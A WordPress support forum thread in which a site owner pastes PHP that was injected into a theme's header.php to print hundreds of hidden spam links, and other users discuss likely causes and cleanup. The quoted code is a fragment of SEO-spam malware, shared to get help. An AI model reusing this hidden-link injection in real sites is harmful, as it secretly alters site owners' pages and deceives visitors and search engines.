Title: Evil exploit in Header.php File Last modified: August 19, 2016 --- # Evil exploit in Header.php File * [ulysses31](https://wordpress.org/support/users/ulysses31/) * (@ulysses31) * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/) * Has anyone else been hit by this – how to stop the exploit happening again? I deleted the code twice now 🙁 * You can see the nasty stuff in the last lines at the bottom. Inserts about 600 invisible links for Viagra in your html source. XD * ``` <?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?>
Home  |  
0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.=''.$k.''; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?> ``` Viewing 6 replies - 1 through 6 (of 6 total) * [Edward Caissie](https://wordpress.org/support/users/cais/) * (@cais) * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091755) * Looks suspiciously like a bad theme to me … which one are you using? * [adamt07](https://wordpress.org/support/users/adamt07/) * (@adamt07) * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091767) * if it’s anything similar to a bug that hit mine a couple weeks ago (the gumblar script) you may want to check the images folder for a script labeled image.php and delete it. There’s a plugin called “exploit-scanner” that could probably help you alot. * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091768) * > … if it’s anything similar to a bug that hit mine a couple weeks ago (the > gumblar script) * gumblar is most definitely **not** a bug. * [adamt07](https://wordpress.org/support/users/adamt07/) * (@adamt07) * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091769) * I guess malware script would have been more appropriate… * [techguy](https://wordpress.org/support/users/crashutah/) * (@crashutah) * [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091810) * Had the same thing happened. Removed the code and it’s gone for now. Now to figure out how it happened in the first place. Any suggestions would be appreciated. * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091811) * most of the exploits lately take advantage of weak and easily guessed ftp passwords * cpanel users are particularly vulnerable with weak passwords because user names carry across all functions control panel, ftp, mysql, etc. * if they keep coming back, they are in more than one script or in the database in which case deleting the code does no good until the db is taken care of * there are plenty of threads here and on google search that addresses cleaning of hacked wordpress blogs * also, if you guys are on shared servers, you should report this to your host so they can look into if other users were also hacked Viewing 6 replies - 1 through 6 (of 6 total) The topic ‘Evil exploit in Header.php File’ is closed to new replies. * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/) * 6 replies * 6 participants * Last reply from: [Samuel B](https://wordpress.org/support/users/samboll/) * Last activity: [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091811) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics